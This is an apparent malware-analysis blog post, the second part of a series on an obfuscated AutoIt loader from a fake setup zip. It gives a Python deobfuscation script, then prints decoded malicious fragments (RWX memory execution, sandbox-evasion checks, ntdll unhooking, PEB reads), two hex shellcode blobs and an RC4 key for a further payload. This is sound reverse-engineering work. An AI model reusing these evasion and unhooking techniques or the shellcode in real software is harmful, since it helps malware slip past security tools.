Malware Analysis 1 - PC_Setup~File-Download-Acces~2025.zip Part 2
In part 1 we received the obfuscated script. Now we de-obfuscate the script using some Python. As a brief explanation, PATMEANS is the decoder function that decodes each line before it is processed by the script. We found where the PATMEANS function is located inside the AutoIt script and, with the assistance of AI, have written a Python script that decodes every line that would otherwise be decoded at run time by the PATMEANS function:
------------------------------
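# deObPATMEANS.py
# malwareZBS and AI
"""Rewrite PATMEANS(...) string calls in an AutoIt script as plain literals.

Every ``PATMEANS("<codes>", <key expr>)`` call found in the input is replaced
in place by the string literal it decodes to, so the rest of the script can be
read as-is. The tool only rewrites text; nothing from the script is executed.
"""
import os
import re
import sys

# Matches e.g. PATMEANS ( "12%34%56" , 100 + 200 ) and captures the code list
# (group 1) and the key expression (group 2). The key group stops at the first
# ')', so a call whose key contains parentheses is left encoded rather than
# mis-parsed.
PATMEANS_CALL = re.compile(
    r'PATMEANS\s*\(\s*"([0-9%]+)"\s*,\s*([^)]+)\s*\)',
    re.IGNORECASE,
)


def decode_patmeans(match):
    """Decode one PATMEANS(...) match into an AutoIt string literal.

    Args:
        match: a regex match whose group 1 is the '%'-separated list of
            decimal character codes and whose group 2 is the key written as
            a sum of decimal integers (e.g. ``"123 + 45"``).

    Returns:
        The decoded text wrapped in double quotes. An embedded double quote is
        doubled (``""``) because that is how AutoIt escapes it inside a
        ``"..."`` literal; without this the replacement would not be valid
        AutoIt when the hidden string itself contains a quote.

    Raises:
        ValueError: a key term or a character code is not a decimal integer,
            or a decoded code is outside the Unicode range.
        OverflowError: a decoded code is too large for chr().
    """
    encoded_str = match.group(1)
    key_expr = match.group(2)
    # The key is spelled "a + b + c"; sum the terms and keep the low 32 bits,
    # mirroring the 32-bit arithmetic the original decoder relies on.
    key_sum = sum(int(term.strip()) for term in key_expr.split('+'))
    effective_key = key_sum % (2 ** 32)
    # Each non-empty field is (char code + key); subtract to recover the char.
    decoded = "".join(
        chr(int(code_str) - effective_key)
        for code_str in encoded_str.split('%')
        if code_str
    )
    return '"' + decoded.replace('"', '""') + '"'


def process_autoit_file(input_file, output_file):
    """Copy *input_file* to *output_file* with every PATMEANS call decoded.

    Lines are handled one at a time. A line whose PATMEANS call cannot be
    decoded is copied through unchanged and reported on stderr, so one bad
    call never stops the rest of the file. File errors are reported on stderr
    rather than raised, keeping the command-line behaviour of the original.

    Args:
        input_file: path of the obfuscated .au3 script. Read as UTF-8; a
            leading byte-order mark (commonly written by AutoIt editors) is
            dropped, and undecodable bytes are passed through unchanged
            via ``surrogateescape`` instead of aborting the run.
        output_file: path of the decoded script, written as UTF-8.
    """
    if os.path.abspath(input_file) == os.path.abspath(output_file):
        # Opening the output for writing would truncate the input before it
        # is read and silently leave an empty file behind.
        print("Error: input and output must be different files", file=sys.stderr)
        return
    try:
        with open(input_file, 'r', encoding='utf-8-sig', errors='surrogateescape') as infile, \
                open(output_file, 'w', encoding='utf-8', errors='surrogateescape') as outfile:
            for line_number, line in enumerate(infile, 1):
                try:
                    outfile.write(PATMEANS_CALL.sub(decode_patmeans, line))
                except (ValueError, OverflowError) as e:
                    # Bad key term / code, out-of-range chr(), or an
                    # unencodable decoded char: keep the original line so the
                    # output is still a complete script.
                    print(f"Error processing line {line_number}: {e}", file=sys.stderr)
                    outfile.write(line)
    except FileNotFoundError:
        print("Error: Input file not found", file=sys.stderr)
    except OSError as e:
        print(f"Unexpected error: {e}", file=sys.stderr)


def main(argv=None):
    """Command-line entry point: ``deObPATMEANS.py <input.au3> <output.au3>``.

    Args:
        argv: argument list without the program name; defaults to
            ``sys.argv[1:]``.
    """
    args = sys.argv[1:] if argv is None else argv
    if len(args) != 2:
        print("Usage: python deObPATMEANS.py <input.au3> <output.au3>", file=sys.stderr)
        sys.exit(1)
    process_autoit_file(args[0], args[1])


if __name__ == "__main__":
    main()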
BEFORE:
AFTER:
Looking at the script, we see some DLL calls:
------------------------------------------
; Fragments pulled out of the decoded script, in order of appearance; most are cut
; mid-expression. UNWRAPPENSTOLERANCE(struct, name) appears to wrap DllStructGetData:
; the field names it is given ("RVAModuleName", "Name", "VirtualAddress",
; "VirtualSize", "PebBaseAddress", "ProcessParameters", "CommandLine") are those
; of PE import/section headers and of the PEB, so the script walks those by hand.
; --- Looks like import resolution for a PE image the script maps itself: read the
; module name at its RVA, LoadLibraryW it, read each imported name, then resolve it
; with GetProcAddress (further down).
DllCall ( "kernel32.dll" , "int" , "lstrlenA" , "struct*" , $DISTRIBUTORSHYPOTHESISLEAST ) [ 0 ] & "]" , $REYNOLDSHELLODISPUTE + UNWRAPPENSTOLERANCE ( $RXINVOLVING , "RVAModuleName" ) )
DllCall ( "kernel32.dll" , "handle" , "LoadLibraryW" , "wstr" , UNWRAPPENSTOLERANCE ( $LIFETIMEFOUNDATIONSLEXUSMOUNTED , "Name" ) ) [ 0 ]
DllCall ( "kernel32.dll" , "int" , "lstrlenA" , "struct*" , $STRAPDEPOTAPPLIEDHONORS ) [ 0 ] & "]" , $REYNOLDSHELLODISPUTE + $PETROB )
; --- Changes page protection in its own process; $COMMENTEDAIMEDTUNNELSCSI is the new
; protection value (not visible here).
DllCall ( "ntdll.dll" , "bool" , "NtProtectVirtualMemory" , "handle" ,
DllCall ( "kernel32.dll" , "handle" , "GetCurrentProcess" ) [ 0 ] , "ptr" , DllStructGetPtr ( $ACTIVEFORT , "address" ) , "ptr" , DllStructGetPtr ( $REDEEMREGIONSVID , "size" ) , "dword" , $COMMENTEDAIMEDTUNNELSCSI , "dword*" , "" )
; --- SetErrorMode round-trip: set 32774 (0x8006), then set 0 and look at the returned
; previous mode. A real kernel32 returns 32774; if it does not, the script closes its
; own AutoIt window (i.e. exits), otherwise it hides the tray icon. This is an
; environment sanity check against emulators/sandboxes that stub the API.
DllCall ( "kernel32.dll" , "uint" , "SetErrorMode" , "dword" , 32774 )
DllCall ( "kernel32.dll" , "uint" , "SetErrorMode" , "dword" , 0 ) [ 0 ] ) <> 32774 ) ? ( Call ( "WinClose" , Call ( "AutoItWinGetTitle" ) ) ) : ( Opt ( "TrayIconHide" , 10504404 / 10504404 ) )
; --- LZNT1 decompression (format 2 = COMPRESSION_FORMAT_LZNT1) of one DllStruct
; buffer into another: an embedded blob is stored compressed.
DllCall ( "ntdll.dll" , "uint" , "RtlGetCompressionWorkSpaceSize" , "ushort" , 2 , "ulong*" , 0 , "ulong*" , 0 )
DllCall ( "ntdll.dll" , "int" , "RtlDecompressFragment" , "ushort" , 2 , "ptr" , DllStructGetPtr ( $MOBILITYSHORTSINVESTIGATION ) , "dword" , DllStructGetSize ( $MOBILITYSHORTSINVESTIGATION ) , "ptr" , DllStructGetPtr ( $DELICIOUSNOWNOVELSPRESENCE ) , "dword" , DllStructGetSize ( $DELICIOUSNOWNOVELSPRESENCE ) , "dword" , 0 , "dword*" , 0 , "ptr" , DllStructGetPtr ( $BMWSHAMEPENALTIES ) )
; --- Resolves an export from a module handle; pairs with the LoadLibraryW above.
DllCall ( "kernel32.dll" , "ptr" , "GetProcAddress" , "handle" , $APPLICABLEBASEMENT , $COOKBOOKALPINEADDITIONALLYPOUR , $KATRINAFORWARDINGSALARYLOTTERY )
; --- RWX buffer (4096 = MEM_COMMIT, 64 = PAGE_EXECUTE_READWRITE) exactly as large as the
; hex blob $RANKGOLDCHARGES, wrapped in a byte[] struct.
DllStructCreate ( "byte[" & Call ( "BinaryLen" , $RANKGOLDCHARGES ) & "]" , DllCall ( "kernel32.dll" , "ptr" , "VirtualAlloc" , "ptr" , 0 , "ulong_ptr" ,
Call ( "BinaryLen" , $RANKGOLDCHARGES ) , "dword" , 4096 , "dword" , 64 ) [ 0 ] )
; --- Transfers control into a struct's memory: the "window procedure" handed to
; CallWindowProc, and the address handed to DllCallAddress, are a struct pointer plus
; an offset. Presumably $THEIRDOCUMENTARY is the RWX struct created above — confirm.
DllCall ( "user32.dll" , "uint" , "CallWindowProc" , "ptr" , DllStructGetPtr ( $THEIRDOCUMENTARY ) + $JUNIORINSERTION , "ptr" , DllStructGetPtr ( $DEVICEBESIDES ) , "ptr" , DllStructGetPtr ( $LYRICRESPECTED ) , "uint" , $RETIREDNPIVCOMPATIBLE , "int" , 0 )
DllCallAddress ( "int" , DllStructGetPtr ( $THEIRDOCUMENTARY ) + $PACKAGESBLOGGERSEMIRATESSPAIN , "ptr" , DllStructGetPtr ( $DEVICEBESIDES ) , "ptr" , DllStructGetPtr ( $LYRICRESPECTED2 ) , "uint" , $RETIREDNPIVCOMPATIBLE2 , "int" , 0 )
DllCall ( "user32.dll" , "uint" , "CallWindowProc" , "ptr" , DllStructGetPtr ( $THEIRDOCUMENTARY ) + $PACKAGESBLOGGERSEMIRATESSPAIN , "ptr" , DllStructGetPtr ( $DEVICEBESIDES ) , "ptr" , DllStructGetPtr ( $LYRICRESPECTED2 ) , "uint" , $RETIREDNPIVCOMPATIBLE2 , "int" , 0 )
; --- Walks the process list (2 = TH32CS_SNAPPROCESS), opens the parent of each entry
; (4112 = 0x1010 = PROCESS_QUERY_INFORMATION | PROCESS_VM_READ) and reads its image
; path with GetModuleFileNameExW — most likely a parent-process check; what it is
; compared against is not in this excerpt.
DllCall ( "kernel32.dll" , "handle" , "CreateToolhelp32Snapshot" , "dword" , 2 , "dword" , 0 ) [ 0 ]
DllCall ( "kernel32.dll" , "bool" , "Process32FirstW" , "handle" , $FURNISHINGSCREATEDFRIENDSHIPCARTOON , "struct*" , $FILTERNOR )
DllCall ( @SystemDir & "\psapi.dll" , "dword" , "GetModuleFileNameExW" , "handle" , DllCall ( "kernel32.dll" , "handle" , "OpenProcess" , "dword" , 4112 , "bool" , 0 , "dword" , UNWRAPPENSTOLERANCE ( $FILTERNOR , "ParentProcessID" ) ) [ 0 ] , "handle" , 0 , "wstr" , "" , "int" , 4096 ) [ 3 ]
DllCall ( "kernel32.dll" , "bool" , "Process32NextW" , "handle" , $FURNISHINGSCREATEDFRIENDSHIPCARTOON , "struct*" , $FILTERNOR )
DllCall ( "kernel32.dll" , "bool" , "CloseHandle" , "handle" , $FURNISHINGSCREATEDFRIENDSHIPCARTOON )
; --- Loads a DLL without running its entry point (1 = DONT_RESOLVE_DLL_REFERENCES),
; commits RW memory at a chosen address (12288 = MEM_COMMIT | MEM_RESERVE,
; 4 = PAGE_READWRITE), calls the function at $PROSTATECONFIDENT with
; (module, 1, 0) — the DllMain(hinst, DLL_PROCESS_ATTACH, NULL) shape — and then
; unloads with LdrUnloadDll.
DllCall ( "kernel32.dll" , "handle" , "LoadLibraryExW" , "wstr" , $HIGHUSR , "ptr" , 0 , "dword" , 1 ) [ 0 ]
DllCall ( "kernel32.dll" , "ptr" , "VirtualAlloc" , "ptr" , $LUISHOPE , "ulong_ptr" , $DERIVERSIDE , "dword" , 12288 , "dword" , 4 ) [ 0 ]
DllCallAddress ( "bool" , $PROSTATECONFIDENT , "ptr" , $LUISHOPE , "dword" , 1 , "ptr" , 0 )
DllCall ( "ntdll.dll" , "bool" , "LdrUnloadDll" , "handle" , $LUISHOPE ) [ 0 ]
; --- Replaces the in-memory ntdll.dll with a clean copy from disk: get the loaded
; module's base/size, open @SystemDir\ntdll.dll read-only (2147483648 = GENERIC_READ,
; 1 = FILE_SHARE_READ, 3 = OPEN_EXISTING), map it as an image (16777218 =
; SEC_IMAGE | PAGE_READONLY, 4 = FILE_MAP_READ), then per section: VirtualProtect to
; RWX (64), memcpy the fresh bytes over the loaded section, restore the old
; protection ($BROADWAYMUSIC[4]). This strips user-mode hooks that security
; products place in ntdll; a process that maps its own ntdll.dll with SEC_IMAGE
; and then writes into the loaded ntdll image is the thing to alert on.
DllCall ( "kernel32.dll" , "hwnd" , "GetCurrentProcess" )
DllCall ( "kernel32.dll" , "hwnd" , "GetModuleHandleA" , "str" , "ntdll.dll" )
DllCall ( "psapi.dll" , "bool" , "GetModuleInformation" , "hwnd" , $INDICATEDCOMPLIANCE [ 0 ] , "hwnd" , $FLUXDJPOWERSDEAN [ 0 ] , "ptr" , DllStructGetPtr ( $IISHAPEORANGE ) , "dword" , DllStructGetSize ( $IISHAPEORANGE ) )
DllCall ( "kernel32.dll" , "hwnd" , "CreateFileA" , "str" , @SystemDir & "\ntdll.dll" , "dword" , 2147483648 , "dword" , 1 , "ptr" , 0 , "dword" , 3 , "dword" , 0 , "ptr" , 0 )
DllCall ( "kernel32.dll" , "hwnd" , "CreateFileMapping" , "hwnd" , $INDEXSALMON [ 0 ] , "ptr" , 0 , "dword" , 16777218 , "dword" , 0 , "dword" , 0 , "ptr" , 0 )
DllCall ( "kernel32.dll" , "ptr" , "MapViewOfFile" , "hwnd" , $CURIOUSPACKSINQUIRE [ 0 ] , "dword" , 4 , "dword" , 0 , "dword" , 0 , "dword" , 0 )
DllCall ( "kernel32.dll" , "bool" , "VirtualProtect" , "ptr" , $BLESSEDBLOG + UNWRAPPENSTOLERANCE ( $FAVORSALGERIAFARMSMENTAL , "VirtualAddress" ) , "dword" , UNWRAPPENSTOLERANCE ( $FAVORSALGERIAFARMSMENTAL , "VirtualSize" ) , "dword" , 64 , "dword*" , 0 )
DllCall ( "msvcrt.dll" , "none:cdecl" , "memcpy" , "ptr" , $BLESSEDBLOG + UNWRAPPENSTOLERANCE ( $FAVORSALGERIAFARMSMENTAL , "VirtualAddress" ) , "ptr" , $CURIOUSPACKSINQUIREADDRESS [ 0 ] + UNWRAPPENSTOLERANCE ( $FAVORSALGERIAFARMSMENTAL , "VirtualAddress" ) , "dword" , UNWRAPPENSTOLERANCE ( $FAVORSALGERIAFARMSMENTAL , "VirtualSize" ) )
DllCall ( "kernel32.dll" , "bool" , "VirtualProtect" , "ptr" , $BLESSEDBLOG + UNWRAPPENSTOLERANCE ( $FAVORSALGERIAFARMSMENTAL , "VirtualAddress" ) , "dword" , UNWRAPPENSTOLERANCE ( $FAVORSALGERIAFARMSMENTAL , "VirtualSize" ) , "dword" , $BROADWAYMUSIC [ 4 ] , "dword*" , 0 )
DllCall ( "kernel32.dll" , "none" , "CloseHandle" , "hwnd" , $INDICATEDCOMPLIANCE [ 0 ] )
DllCall ( "kernel32.dll" , "none" , "CloseHandle" , "hwnd" , $INDEXSALMON [ 0 ] )
DllCall ( "kernel32.dll" , "none" , "CloseHandle" , "hwnd" , $CURIOUSPACKSINQUIRE [ 0 ] )
DllCall ( "kernel32.dll" , "none" , "FreeLibrary" , "hwnd" , $FLUXDJPOWERSDEAN [ 0 ] )
; --- Two calls fused on the next line. Opens another process (PID $DOLLARTRANSPARENT,
; same 0x1010 access) and reads its command line the long way: PEB address via
; NtQueryInformationProcess (class 0 = ProcessBasicInformation), then
; PEB -> ProcessParameters -> CommandLine with NtReadVirtualMemory.
DllCall ( "kernel32.dll" , "handle" , "OpenProcess" , "dword" , 4112 , "bool" , 0 , "dword" , $DOLLARTRANSPARENT ) [ 0 ]DllCall ( "ntdll.dll" , "long" , "NtQueryInformationProcess" , "handle" , $ASPMARRIOTTDOZEN , "ulong" , 0 , "struct*" , $DPATHENSAPPS , "ulong" , DllStructGetSize ( $DPATHENSAPPS ) , "ulong*" , 0 )
DllCall ( "ntdll.dll" , "long" , "NtReadVirtualMemory" , "handle" , $ASPMARRIOTTDOZEN , "ptr" , UNWRAPPENSTOLERANCE ( $DPATHENSAPPS , "PebBaseAddress" ) , "struct*" , $FOLLOWINGREVEALEDDEPOSITS , "ulong_ptr" , DllStructGetSize ( $FOLLOWINGREVEALEDDEPOSITS ) , "ulong_ptr*" , 0 )
DllCall ( "ntdll.dll" , "long" , "NtReadVirtualMemory" , "handle" , $ASPMARRIOTTDOZEN , "ptr" , UNWRAPPENSTOLERANCE ( $FOLLOWINGREVEALEDDEPOSITS , "ProcessParameters" ) , "struct*" , $CLOSESTIMPORTEDFRENTERS , "ulong_ptr" , DllStructGetSize ( $CLOSESTIMPORTEDFRENTERS ) , "ulong_ptr*" , 0 )
DllCall ( "ntdll.dll" , "long" , "NtReadVirtualMemory" , "handle" , $ASPMARRIOTTDOZEN , "ptr" , UNWRAPPENSTOLERANCE ( $CLOSESTIMPORTEDFRENTERS , "CommandLine" ) , "wstr" , 0 , "ulong_ptr" , DllStructGetSize ( $SHIPECONOMICSAPTLOUISE ) , "ulong_ptr*" , 0 )
DllCall ( "kernel32.dll" , "bool" , "CloseHandle" , "handle" , $ASPMARRIOTTDOZEN )
; --- Unmaps a section view in its own process at $PTPATRICIABED; what is mapped
; there is not visible in this excerpt.
DllCall ( "ntdll.dll" , "int" , "NtUnmapViewOfSection" , "handle" , DllCall ( "kernel32.dll" , "handle" , "GetCurrentProcess" ) [ 0 ] , "ptr" , $PTPATRICIABED )
; --- Elapsed-time measurement around a Sleep; this shape is typically used to notice
; sandboxes that fast-forward sleeps.
DllCall ( "kernel32.dll" , "long" , "GetTickCount" ) [ 0 ]
DllCall ( "kernel32.dll" , "DWORD" , "Sleep" , "dword" , $IISHAPEORANGELIS )
DllCall ( "kernel32.dll" , "long" , "GetTickCount" ) [ 0 ]
; --- Queries its own PROCESS_BASIC_INFORMATION (class 0) and reads 4 bytes at field 2
; (PebBaseAddress) + 16. Which PEB member sits at +0x10 depends on bitness
; (ImageBaseAddress on x64, ProcessParameters on x86) — not determinable here.
DllCall ( "kernel32.dll" , "handle" , "GetCurrentProcess" )
DllCall ( "ntdll.dll" , "int" , "ZwQueryInformationProcess" , "hwnd" , $ATTRACTIONSEEKSGODLOT1 [ 0 ] , "int" , 0 , "ptr" , DllStructGetPtr ( $INVESTINGBLEND ) , "int" , DllStructGetSize ( $INVESTINGBLEND ) , "int" , 0 )
DllCall ( "kernel32.dll" , "int" , "ReadProcessMemory" , "hwnd" , $ATTRACTIONSEEKSGODLOT1 [ 0 ] , "ptr" , UNWRAPPENSTOLERANCE ( $INVESTINGBLEND , 2 ) + 16 , "ptr" , DllStructGetPtr ( $TOOLINSURANCE ) , "int" , 4 , "ptr" , 0 )
DllCall ( "kernel32.dll" , "int" , "CloseHandle" , "hwnd" , $ATTRACTIONSEEKSGODLOT1 [ 0 ] )
------------------------------------------
Cookie-cutter malware calls: an RWX VirtualAlloc buffer that is entered through CallWindowProc/DllCallAddress, a SetErrorMode round-trip check, a Toolhelp32 walk that opens the parent process, a clean ntdll.dll mapped from @SystemDir and copied over the loaded one, and PEB reads through NtQueryInformationProcess/NtReadVirtualMemory.
There also appear to be three payload sections in hex:
------------------------------------------
; Two raw code blobs; the VirtualAlloc above is sized by BinaryLen($RANKGOLDCHARGES) and
; the @AutoItX64 check below selects which one is assigned. CodeA opens with REX-prefixed
; instructions (48 89 C8 ...) and is the 64-bit variant; CodeB (55 31 C0 ...) is the
; 32-bit one. The "//CodeA" / "//CodeB" tails are the article's labels, not AutoIt syntax.
Local $RANKGOLDCHARGES = "0x9090554889C84889D54989CA4531C95756534883EC08C70100000000C741040000000045884A084183C1014983C2014181F90001000075EB488DB9000100004531D2664531C9EB3641BA0100000031F60FB658080FB6142E8D3413468D0C0E450FB6C94D63D9420FB6741908408870084883C00142885C19084839F8740E4539D07EC54963F24183C201EBC44883C4085B5E5F5DC389C056534883EC084585C0448B11448B49047E4E4183E8014A8D7402014183C2014181E2FF0000004963DA0FB6441908468D0C08450FB6C94D63D9460FB644190844884419084288441908418D04000FB6C00FB644010830024883C2014839F275BB448911448949044883C4085B5EC3" //CodeA
Local $RANKGOLDCHARGES = "0x90905531C057565383EC088B4C241C8B7C2420C70100000000C74104000000008844010883C0013D0001000075F28D910001000031DB8954240489C831D2891C2489CEEB32C704240100000031ED0FB648080FB61C2F8D2C198D5415000FB6D20FB66C160889EB88580883C001884C16083B44240474128B0C24394C24247EC58B2C2483042401EBC583C4085B5E5F5DC2100089C05557565383EC088B5424248B44241C8B6C242085D28B188B48047E5B31D2895C2404892C248B5C240483C30181E3FF000000895C24040FB67418088B6C24048D0C0E0FB6C90FB67C080889FB885C280889F38D343781E6FF000000885C08080FB67430088B3C2489F3301C1783C2013B54242475B089EB891889480483C4085B5E5F5DC21000" //CodeB
------------------------------------------
This seems to be a check of sorts (excuse my non-syntax): `@AutoItX64` is true when the script runs under 64-bit AutoIt, so it selects the 64-bit or 32-bit blob:
IF {
Execute ( "@AutoItX64" ) ;
Then $RANKGOLDCHARGES = CodeA ;
Else
$RANKGOLDCHARGES=CodeB;
}
-------------------------------------------
The third payload is a large hex blob that, when decrypted with RC4 using the key "7934829523295748309624084421185521891819", produces a binary with random bytes inserted:
And with that, this part 2 is over. Stay tuned for part 3!!